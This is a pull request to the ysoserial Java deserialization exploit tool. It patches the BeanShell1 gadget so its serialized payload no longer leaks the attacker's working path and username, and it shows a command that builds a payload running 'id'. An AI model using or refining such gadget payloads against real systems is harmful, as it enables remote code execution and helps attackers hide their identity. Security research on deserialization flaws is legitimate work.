### PR TITLE
Fix the bug that BeanShell1 gadget leaks the current running path

### DIFF
--- a/src/main/java/ysoserial/payloads/BeanShell1.java
+++ b/src/main/java/ysoserial/payloads/BeanShell1.java
@@ -4,6 +4,7 @@ import bsh.Interpreter;
 import bsh.XThis;
 
 import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Method;
 import java.lang.reflect.Proxy;
 import java.util.Arrays;
 import java.util.Comparator;
@@ -36,6 +37,10 @@ public class BeanShell1 extends PayloadRunner implements ObjectPayload<PriorityQ
 
 	// Create Interpreter
 	Interpreter i = new Interpreter();
+	// Clear current running path information
+    Method setu = i.getClass().getDeclaredMethod("setu",new Class[]{String.class,Object.class});
+    setu.setAccessible(true);
+    setu.invoke(i,new Object[]{"bsh.cwd","."});
 
 	// Evaluate payload
 	i.eval(payload);


### PR DESCRIPTION
The serialized data generated by `BeanShell1` contains the path to run ysoserial, and these paths often contain the username of the current user. This means that using this gadget will reveal your ID.

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar BeanShell1 id

![image](https://user-images.githubusercontent.com/15975792/133103158-e3eec361-7de9-44e2-98cc-415b45f5ada5.png)
